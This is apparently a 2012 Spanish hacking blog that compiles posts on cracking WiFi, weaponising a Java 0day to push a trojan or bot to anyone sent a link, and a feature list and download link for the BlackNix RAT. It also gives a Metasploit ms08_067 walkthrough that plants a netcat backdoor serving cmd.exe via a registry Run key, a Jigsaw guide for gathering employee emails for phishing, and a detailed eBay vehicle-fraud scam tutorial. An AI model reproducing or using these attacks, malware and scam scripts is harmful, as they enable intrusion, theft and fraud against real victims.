Social Icons

viernes, 16 de noviembre de 2012

Crackear redes Wifi con tu android(En modo Monitor)



Seguramente a muchos les paso por la cabeza la idea de crackear redes wifi con su smartphone, pero para nuestra mala suerte no se podía  por que sorprendentemente el modo monitor(modo para snifear el trafico Wifi) no se puede encontrar en cualquier dispositivo android(por no decir todos), ya que el chipset que se utiliza en los dispositivo android que mayormente son realizadas por Broadcom no añadieron el soporte para el modo monitor.

Pero un grupo de investigadores decidieron pasar sus vacaciones viendo la forma de añadir el modo monitor a sus android(Nexus One y Galaxy S II), en un primer momento compilaron el controlador en modo depuración, y se dieron cuenta que el modulo elimina los encabezados 801.11 en Hw, con la cual concluyeron que se necesita hacer un cambio de firmware en sus dispositivos android, así que empezaron hacerle ingeniería inversa al firmware y después de unas semanas obtuvieron una compresión decente de la recepción de paquetes en el proceso, con lo cual sacaron su 1er firmware con el modo monitor añadido.

Actualmente tienen un firmware parchado para los siguientes chipset:


Si disponemos uno de los modelos de android descritos anteriormente, es mas probable que funcione esos firmware, pero las pruebas han sido hechas con la ROM Cyanogen 7 y Cyanogen 9, que son unas rom personalizadas y que ha tenido una aceptable aprobación entre las personas que usan dispositivos android por su estabilidad.

Instalación del firmware:

 Ser usuarios "root" en nuestro android.
 (Opcional) Tener la rom Cyanogen en nuestro android.
 Descargar el firmware para Android Nexus One ó para Android Galaxy S II
 Extraer el Archivo .zip en su dispositivo android (por ejemplo en su sdcard)
 Ejecutar 'sh setup.sh' en un terminal(como adb ssh, SManager, etc)
 Ahora debemos tener una interfaz eth0(Nexus One) ó wlan0(Galaxy S II) en modo monitor.
 Ahora ejecutar '' ó '' y obtendremos un resultado como esto:

eth0      IEEE 802.11-DS  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.412 GHz  Access Point: Not-Associated
          Bit Rate:72 Mb/s   Tx-Power:32 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Managementmode:All packets received
          Link Quality=5/5  Signal level=0 dBm  Noise level=-92 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Y para la instalación del firmware en otros dispositivos android:

 Dar un vistazo el código fuente http://code.google.com/p/bcmon/source/checkout
 Desarrollar el archivo .ko para nuestro dispositivo(en la wiki Cyanogen nos debería ayudar)
 Seguir los pasos de instalación para Nexus One ó Galaxy S II

Los archivos binarios de AirCrack

 aircrack-ng suite
 tcpdump
 iwconfig
 aircrack-static(para poder utilizar comandos como ''

Descargarlo de http://bcmon.googlecode.com/svn/trunk/bundles/utils.zip

AeroDump en ejecución en Nexus One
Eso es todo, y a probar, eso si, no me responsabilizo por los daños ó fallos que le puedan ocurrir a sus dispositivos android, hagan lo bajo su responsabilidad.

Para mayor información http://bcmon.blogspot.com/

jueves, 8 de noviembre de 2012

Minecraft Griefing !!!

Hey guys, this is my simple guide for the new people on how to install a griefing client in 4 steps 


Also feel free to suggest more tutorials i should make, i will gladly try my best at them :)


Step one
Make sure you have a client on your desktop

[Image: yH5gI.png]

Step two
Go to your C:\Users\*Your User Name*\AppData\Roaming\.minecraft (go into run and type %Appdata% , there will be a picture on how to un hide your App data folder ) and go into .minecraft/bin and replace your griefing client with your minecraft.jar

[Image: hJxUV.png]

Step three
Run Minecraft???..PROFIT!!

[Image: ucZq4.png]

How to un hide AppData
Go to Run and type in %appdata%, click on top to go to AppData, and simply right click and click hidden, so the check in the box goes the box

[Image: nMX1x.png]


Please note, i am using my teams client in this, but you can download free clients from this blog


Griefing Packs: http://www.mediafire.com/?u9amxjpcrfpvp41

Minecraft: https://s3.amazonaws.com/MinecraftDownload/launcher/Minecraft.exe

sábado, 13 de octubre de 2012

Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7





Un investigador de seguridad ha encontrado una nueva Vulnerabilidad 0day que afecta a Internet Explorer, mientras se realizaba un análisis de una página de malware que se estaba utilizando para explotar las vulnerabilidades de Java.

Según el equipo de Metasploit, el Internet Explorer 7, 8 y 9 en Windows XP, Vista y 7 son vulnerables a este ataque.

Eric Romang ha descubierto una carpeta "/public/help" en uno de los servidores infectados. Él encontró un archivo flash (.Swf), dos paginas html (protect.html, exploit.html) y el archivo exe.


Al abrir la página exploit.html, carga el archivo flash, que a su vez carga la otra página HTML (protect.html). Juntos, ayudan a bajar el archivo ejecutable en la computadora de la víctima.

El equipo de Metasploit inmediatamente ha desarrollado el módulo para este exploit. Según los investigadores de Metasploit, el exploit, que ya había sido utilizado por los atacantes maliciosos en la naturaleza antes de que fuera publicado en Metasploit, afecta a alrededor del 41% de los usuarios de Internet en América del Norte y el 32% a nivel mundial.

Desde que Microsoft no ha lanzado un parche para esta vulnerabilidad, sin embargo, se aconseja a  los usuarios de IE cambiar a otro navegador hasta que una actualización de seguridad disponible.


exploit.html
Este archivo se reconoce como un archivo HTML, y  por 0 anti-virus en VirusTotal

"exploit.html" es el punto de partida del ataque. Este archivo se crea una matriz de "img" y carga  el archivo Flash "Moh2010.swf" 



Moh2010.swf
Este archivo es reconocida como una película de Macromedia Flash Player, y por 0 anti-virus en VirusTotal

Se puede observar que el archivo está lleno de DosSWF que se descomprimira en la memoria. Después de la descompresión "Moh2010.swf" el archivo se derrama en el montón y eval un iframe al archivo "Protect.html".


El código ActionScript incrustado en el original lleno de archivos SWF, también es interesante, podrás ver algunos de codificación especial (chino?).

Este archivo, que durante la explotación es también comprobar si el sitio web está en Flash Website Storage Settings pannel para nada más cargar el archivo "Protect.html". Esto significa, que una vez infectado el usuario ya no será explotado a pesar de nuevas visitas a la página web.

Muestra en la primera visita:
Muestra de la explotación exitosa:



Muestra en otras visitas:



Protect.html
Este archivo se reconoce como un archivo HTML, y  por 0 anti-virus en VirusTotal

Si usted echa un vistazo al código fuente, se puede ver el código javascript interesante, como es la manipulación de la "img" matriz creada por "exploit.html".

También verá que las pruebas se hacen, con destino a Windows XP 32-bit e Internet Explorer 7 u 8.



111.exe
Este archivo se reconoce como un archivo de imagen Autodesk FLIC, y por 0 anti-virus en VirusTotal

El archivo se ha enviado a Malware Tracker (baabd0b871095138269cf2c53b517927), este archivo se ve sospechoso y requiere mas investigaciones.


Si deseamos tener el modulo para explotar esta vulnerabilidad desde el Metasploit, es necesario actualizar la misma desde el siguiente link: https://community.rapid7.com/docs/DOC-1975

La captura de pantalla siguiente se muestra un ataque exitoso contra una máquina de Windows 7 con Internet Explorer 9 instalado:



Está es en contra de Internet Explorer 8 instalado:



He aquí otro ejemplo de la explotación en un Windows XP SP3 box, totalmente parcheado:


El exploit también trabaja en contra de Windows Vista.

Fuentes de Información:



Enumeración de Email e Informacion con JIGSAW




Jigsaw es una herramienta basada en Ruby que nos permite enumerar la informacion (E-mail, Direccion, Nombre y Apellidos y Cargos) de las personas que laboran en una empresa ya sea en Facebook, Google, Microsoft u otros.

Mayormente esta informacion puede servir para realizar Ing. Social o E-mail Pishing. 



UBICACIÓN:

  • Aplicaciones - BackTrack - Information Gathering - Network Analysis - OSINT Analysis - jigsaw




MODOS DE USO:


  • En este caso obtendré información de Facebook, para ello usare el comando: ./jigsaw.rb -s Facebook


  • He obtenido algunos ID mostrando el nombre de la entidad a la que corresponde, entonces colocare el comando incluyendo el numero de ID de la entidad que queremos obtener información  ejemplo: ./jigsaw.rb -i 234590 


  • Como vemos, el ID que he colocado ha arrojado 2 dominios, por lo tanto nos muestra un mensaje indicando que coloquemos el dominio de la cual queremos obtener información, en este caso colocarefacebook.com


  • La información que se obtuvo fue de 479 records en la cual incluye Nombres y Apellidos, Cargos, E-mail y Dirección Domiciliaria.

Ahora, si queremos guardar la información obtenida y luego visualizarla nuevamente, simplemente colocaremos los siguientes comandos:

  • ./jigsaw.rb -i 234590 -r facebook
  • facebook.com
  • ls
  • cat facebook.csv



VIDEO-TUTORIAL:


DESCARGAR JIGSAW:

dSploit – Suite de Pen-testing en Android









INTRODUCCIÓN:

Simone Margaritelli (alias Evilsocket) recientemente público dSploit, un nuevo proyecto dedicado al mundo Android con la capacidad de realizar análisis y pruebas de penetraciones de red que llevan a un dispositivo móvil y a un profesional avanzado realizar una evaluación de la seguridad de IT.

Una vez que la aplicación se inicia, el usuario será capaz de mapear su red, identificar los sistemas operativos y servicios que se ejecutan en otros parámetros, realizar búsqueda de vulnerabilidades conocidas, descifrar los procedimientos de acceso de los métodos más comunes de autenticación, realizar ataques man in the middle y por lo tanto tiene el control total del tráfico de red, tanto pasiva con un sniffer contraseña y disector de los protocolos más comunes que la manipulación activa de paquetes en tiempo real desde y hacia otras máquinas en nuestro propia red, etc.



REQUISITOS:

  • Un dispositivo Android con la version 3.0 o superior.
  • El dispositivo debe estar rooteado.
  • El dispositivo debe tener una instalación BusyBox completo, esto significa con cada utilidad instalada (no la instalación parcial).



Actualmente dSploit esta en versión beta la cual se distribuye a través del circuito GitHub por lo que se puede encontrar el archivo APK para instalar directamente en su dispositivo!


CAPTURA:





INFORMACIÓN - DESCARGA:

Explotando Java7 0day - Exploit .JAR


Explotando Java7 0day - Exploit .JAR by CalebBucker


Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
Pass: calebbucker

Necesitaremos el Programa Eclipse:
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: http://java.softonic.com/

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo Gondvv.java y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("http://www.sitio-web.com/file.exe");




Ahora, abrimos el archivo applet1.java y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.



Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>


En mi caso el codigo queda de la siguiente manera:

<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>



Esos archivos la subimos en nuestro Host, de preferencia de pago.

Ahora solo queda enviar el link: www.sitio-web.com/index.html a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado 




Esta vulnerabilidad también puede ser explotada desde Metasploit:

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

Autor: CalebBucker

domingo, 30 de septiembre de 2012

BlackNix 1.3 RAT


[Image: 1347551346-banniere.png]

[Image: 120830123206806998.png]

BlackNix rat is a rat coded in delphi. 
BlackNix rat have much features (i think)
If you have some idea for next update you can send me PM Smile

Feature from the new version

---> More Fun Feature
---> Patched Memory (you can host any number of bots without crash of client)

Client Features:

  • Notify sound custom
  • Keylogger fully custom (color can be custom) you can auto-color some Windows Title like "Steam" "Facebook" ect..
  • Auto Update-Server
  • Statistics Connections
  • Show Cpu Usage and memory
  • WebCam Capture
  • Show Thumbails
  • Open DVD
  • Close DVD
  • Patched Memory (you can host any number of bots without crash of client)
  • P2P Spread
  • 4 Skins
  • Edit identification
  • Unstall,close,restart server or computer
  • Update Server
  • Share Server (you can share your bot with your friend who have blacknix)
  • Sock5
  • Usb Spread working on XP / Windows 7 / Windows 8
  • Download and execute (url)
  • Download and execute (file)
  • Fun Stuff
  • Open WebSite
  • Message Box
  • Icon Changer
  • Binder
  • Clear Steam (force target, to enter ID on steam)
  • Run ShellCode (C/Delphi/ASM)
  • File Manager with icons ! Refresh,execute,delete,new,rename,download,upload,set wallpaper, new folder and more feature Wink
  • Transfers Download/Upload Manager
  • Windows Manager (close windows,kill windows,change title of windows,minimised,maximised,freeze,unfreez,send key
  • Search in HDD file
  • Services Manager (install your service,remove service,start service,stop service
  • Process Manager (kill,start,view)
  • Registry Manager (refresh, modify,rename,delete,make key string,binary,value,multi-string)
  • Applications Manager (show,uninstall)
  • Remote Desktop (Quality custom,mouse,keyboard,move of mouse or no, save screen, delete wallpaper,block mouse and keyboard ect..)
  • Keylogger Online
  • Keylogger Offline per day
  • Audio Capture
  • Password Recovery firefox,messenger,protected storage
  • Wireless Manager
  • Remote Shell
  • And much more feature Wink

Server Features:

  • Coded in delphi & ASM
  • Work under all Windows and Linux/Mac OS (under Wine)
  • Group System and identification system
  • Ghost system (you can know if you have bot offline or no)
  • Server can be installed on Windows,Program Files,Application Data (bypass UAC), or where you want (custom installs)
  • Add to startup Registry
  • Add to startup Active X
  • Injection into Browser
  • Persistence Registry
  • Persistence Process
  • Offline Keylogger
  • Light stub and normal stub
  • Offline Screen
  • Anti sandboxie
  • Mutex

Thanks to:

---> counterstrikewi (nice snippet) 
---> DarkCoderSc (for help me to start delphi 2 years ago) 
---> Thanks to all other member who help me for test the rat :ninja:



DOWNLOAD: https://www.dropbox.com/s/rkvgc6zavzm5a2s/BlackNix%201.3.zip

viernes, 7 de septiembre de 2012

Hide IP Easy 5.0.8.2



Software para la seguridad en Internet mediante la sustitución de su verdadera dirección IP a otra.

Sencillo y sin pretensiones

Sólo pulsar un botón y su verdadera dirección IP se oculta, el siguiente clic y dirección IP ha cambiado una vez más, así, haga clic en tercera puede volver a su dirección real.

Características principales Hide IP Fácil: - Protege contra cualquier sitio que trata de "un seguimiento" de sus preferencias o siga usted en una dirección IP única - Ayuda a evitar el uso de su información personal para enviar correo basura y otros desechos.

Protege contra los hackers al ocultar las direcciones IP, así como información sobre el operativo sistema.

Posibilidad de cambiar las direcciones IP con frecuencia aumenta la seguridad

Activar y desactivar Hide IP como desee en un solo clic  le permite eludir la limitación de los propietarios de algunos de los recursos disponibles para los usuarios de ciertos países o regiones geográficas - Uso con el correo -servicio para enviar cartas anónimas.

Descarga: http://www.mediafire.com/?sr5pfoi6xuuohod

jueves, 6 de septiembre de 2012

Free Tutorial: Fast Money eBay.es Vehicle Fraud Tutorial




Este es un breve tutorial completo sobre el fraude de vehículos en eBay.es. En este tutorial se quiere
tener toda la información actualizada sobre cómo fresco para obtener su vehículo en juego Fraude en España
y la mayor parte de Europa. Este tutorial es una de las muchas que vendrán versiones cortas de la muy alta
calidad de los kits de estafa famosos conocidos por ser vendidos por ™ Blood Money dimensión en el alto
solicitud de versiones más cortas de los kits de esta es la primera de la serie. Así que aquí vamos, obtener
profundo en el tutorial aniversario de la serie de cortos y vamos a ver lo que está pasando en el
Versión española del gigante eBay.

Intro:

Una breve introducción de la guía de aprendizaje y de negocios en eBay.es fraude y la propia España.
Como la mayoría de ustedes que son familliar con mis Kits Información saber Fraude vehículo en la mayoría
Paises europeos de eBay, como Reino Unido, Alemania y Francia se complica
para llegar al éxito debido a la gran cantidad de vehículos que figuran y que el depthness
los perros guardianes de eBay pasar. Por ello, en esta ocasión vamos a través de eBay en España
defectos y de sistema muy inseguro de vender vehículos de alta de precio. En este tutorial se quiere
tener la información completa sobre cómo conseguir su juego en eBay Classic en eBay y eBay ambos
Anuncios. Enjoy! :-)

* Anuncios de eBay

1.1 Añadir su vehículo
______________________


http://compraventa.ebay.es/

Al abrir esta usted se enterará de que la página de índice de eBay.es se divide en 2 partes
eBay Anuncios Classic y eBay. En este caso vamos a ir a eBay Anuncios.

+ Al hacer clic en eBay Anuncios

- En la parte superior derecha hay un botón rojo llamado "Pon tu Anuncio GRATIS!" cual
significa una lista de tus cosas gratis. Haga clic en el botón presentada.
Inicio => ¡Pon tu Anuncio GRATIS!
- Elige Una categoria -> Motor -> Coches (Cars) -> Audi ->

NOTA: Al pulsar marca del coche que se expande un menú con el año de fabricación del vehículo
Usted tendrá que ir con un coche que está registrado en el 2008, no es necesario un vehículo nuevo porque
usted no necesita todo ese fuego y la atención, necesita un vehículo bastante utilizado con un promedio de KM
registrado entre 24 000 y 000 60, el coche todavía está en excelentes condiciones. (En el caso
de la venta de un vehículo nuevo perfectamente como la mayoría de chicos nuevos fraude vehículo estaría tentado mucho
de preguntas y exclamaciones signos serán levantados de entre compradores y usted tendrá un tiempo difícil
sacar el dinero of'em. Entonces, ¿cómo el título de este tutorial sugiere alta calidad Rápido Dinero gratis
es lo que estamos buscando.) años que han transcurrido desde 2006 hasta 2009 máximo. En este caso, una
Audi A4 2.0 TDI (DPF) Avant / NAVI / XENON a € 9,499.

- Seleccione el año y pulse la tecla "Seguir" botón

= Datos Generales

- Categoría:
Motor> Audi del 2008 (change)

- Rellenar el Modelo; KM; Combustible; Tipo de Vendedor: Siempre Particular

- Precio del vehículo. El precio del vehículo debe ser de aproximadamente un 25% inferior para los vehículos que costo real
es de entre € 8.000 y € 15.000. De esta manera el precio no será menor de una manera que podría ser irreal
y los compradores se ponen muy sospechoso y hacer un montón de quesionts en lo que está mal con el coche
y por qué lo estás vendiendo y no va a ser no muy cerca de los precios reales del coche, ya sea por lo que se
obtener una cantidad ridícula de chicos interesados. En este caso del Audi A4 2.0 TDI cual los precios reales
es € 9.499 (coche ya vendido en autoscout24.de cual es el sitio web que recomiendo conseguir los coches
usted está enumerando en eBay.es) su precio será de € 7.050. Esto mantendrá una línea muy fina y estable de
credibilidad para el cual la audiencia española es bastante fresco.

- Fotos / Subir máximo 3 fotografías y tener otro 2 en stock para los tontos de correo electrónico después de que
ha pedido a sus cuestiones primera y que está listo para quemar.

NOTA LOCALIZACIÓN: Usted y su esposo se encuentran en el Reino Unido en este momento, pero el coche está en
Granma en este momento y registrada en España, por lo que pensaba venderlo en España para evitar los impuestos sería
ser una ideea mejor ya que los impuestos sobre el cambio de registro de un país a otro son altos.
Ubicación actual del coche es un cargador en la oficina, porque Granma no puede manejar la venta.

- Descripción / Descripción españoles en este caso no tiene que ser muy largo. Debe tener un aspecto
algo como esto: "Hola, gracias por vieweing mi puesto clasificado estoy Jeenie y lo hemos hecho.
puesto mucho amor, tiempo, trabajo y esfuerzo en mantener este coche el más limpio. Se encuentra al lado de mi hijo de 5
años de edad, hijo de las cosas que más aprecio, ya que es el coche que todos los días en coche, y yo también lo
como me paso mucho tiempo con mi hijo. Me siento muy unido a este vehículo, pero tengo que dejarlo ir
ya que queremos comprar el nuevo 2012 A4. Estoy triste por vender, pero tenemos que seguir adelante, es un
Lo bueno de Richard mi hijo no le importa mucho sobre los coches a su edad ya que 2 de nosotros nos
habría tenido un problema dejarlo ir. Pero aquí está a la venta al precio de 7.050 con el nuevo
horisons en conseguir el nuevo vehículo. El auto está en excelentes condiciones, solamente 38 000 millas
en 4 años desde que compró, primer propietario. Sé que esto va a ser un placer a su dueño al lado "

- Google.com> encuentre un código postal de Madrid y número de teléfono que puede hacer una lista, introduzca su dirección de e-mail,
código postal y teléfono, no marque el me llame por teléfono unles desea contestar los teléfonos y
hablar por teléfono con la gente cual es un tutorial completamente diferente que usted puede preguntar acerca de si necesita
Acepto los términos y presione el botón Publicar.

Hay que ir usted tiene su vehículo en la lista.

+ El formato de la estafa (total de la lista)

- Se enumeran un vehículo en eBay.es Anuncios clasificados cosa que está en Inglés.

- Se enumeran un vehículo que no es perfectamente nuevo, pero en excelente estado siendo conducido por una mujer

- Kilometraje Excelente, excelente trabajo del cuerpo, sin rasguños, muy bien cuidado.

- Una pareja de recién casados ​​con un hijo de 5 años, el coche de la madre al cual ella va de compras y
impulsa al niño a kindergarden. Ella está completamente enamorada del coche, pero tiene que dejarlo ir porque
Richard el niño de 5 años tiene un coche nuevo es su vida porque ahora es ir a la escuela el próximo año y
las cosas van a cambiar. La mujer mira decepcionado, nostálgico y sin duda alguna con el dolor en la venta
del vehículo, pero ella tiene que dejarlo ir

- El precio del coche es ridículamente lento unos 2,5 k por debajo del precio del mercado, incluso se puede enumerar
este vehículo a un menor 3k para conseguir chicos más interesados, no van a pedir mucho, que te caiga en la historia
ya que son camino en este dramático "Little Big" historia de la madre dejar que el vehículo vaya. Una gran cantidad de
chicos interesados ​​será, un estimado de 60 diferentes compradores / preguntas para el vendedor por día.


2.1 Pago y Estafa
_________________________


+ Pago y Estafa


El coche ha sido clasificado y los compradores comienzan preguntar. No empiece a responder a las preguntas las primeras horas después de
enumerando el vehículo. Espere un poco, que entrar en ella. La historia es que usted se está expuesto más arriba también que se basan
en el Reino Unido y el coche está registrado en España a causa de la madre de la esposa, por lo que para altos fines gravar este coche se vende
en España, mientras usted se encuentra en el Reino Unido.

- Pago: Después de borrar el estado del vehículo y los detalles técnicos sobre el cual es necesario tener coche, desde donde se
por primera vez el coche en el primer lugar (ws: autoscout24.de) el comprador tendrá que proceder a la inspección del vehículo. Tan
Hasta aquí todo bien, el precio del vehículo es de 7.050. Puesto que usted está ubicada en el Reino Unido y la abuela es demasiado viejo para manejar grandes ventas
como este se necesita un depósito de 3.000 realizado a través del Programa de Protección de eBay Compra (Facturas, dominios y
máquinas virtuales se pueden proporcionar también) para que usted venga a España a fin de que el coche puede ser inspeccionado.

DROP: Transferencia de Western Union o transferencia de alambre alambre de banco (transferencia de alambre de banco se prefiere que la mayoría de los compradores dicen inmediatamente
sí para que los bancos en el ojo pineal su vida social son difíciles de engañar) gota sede en Reino Unido en esta estafa particular.

Liberty Reserve Intercambiador: Liberty Intercambiadores de reserva son siempre la mejor, imposible de rastrear el dinero fácil rápido, le ahorra
de la molestia de tener el dolor de cabeza de ser estafado por su caída o no, alto% y mucho más problemas otra

* Usted tendrá un promedio de 50 chicos interesados ​​por día. Un depósito de 3000 en una tasa de éxito de, digamos, 4 de cada 10
chicos es sobre 40-50k al día, si todo se hace correctamente. Desde hace un par de días, es dinero Richie Rich.

domingo, 26 de agosto de 2012

Backdoor en window con metasploit y netcat

Buenas buenas gente!
hoy les traigo com hacer un backdoor a un window$ con 'Metasploit' ( el dios de dioses ) y el netcat (nc)
si usan un poco la imaginacion se puede hacer un monton de cosas ;) 

primero copiamos este archivo que es el netcat para windows al escritorio para un acceso mas rapido


root@bt:~# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/

ahora abrimos el metasploit y comenzamos la configuracion

root@bt:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi)) > set lhost 192.168.1.102 (IP victima)
msf exploit(ms08_067_netapi)) > set rhost 192.168.1.103 (nuestra IP)
msf exploit(ms08_067_netapi)) > exploit

usa vez que allamos explotando la vulnerabilidad y tengamos acceso a meterpreter empezamos a configurar el backdoor

meterpreter > upload /root/Desktop/nc.exe C:\\WINDOWS\\system32\\
meterpreter > reg enumkey -k HKLM\\Software\\Windows\\CurrentVerion\\RUN
meterpreter > reg setval -k HKLM\\Software\\Windows\\CurrentVerion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 666 -e cmd.exe"
meterpreter > reg enumkey -k HKLM\\Software\\Windows\\CurrentVerion\\RUN
meterpreter > reboot

el windows se reiniciara, y ejecutara nuestro backdoor al inicio.

y ahora nos conectamos que el netcat de nuestra maquina


root@bt:~# nc 192.168.1.102 666

Listo :D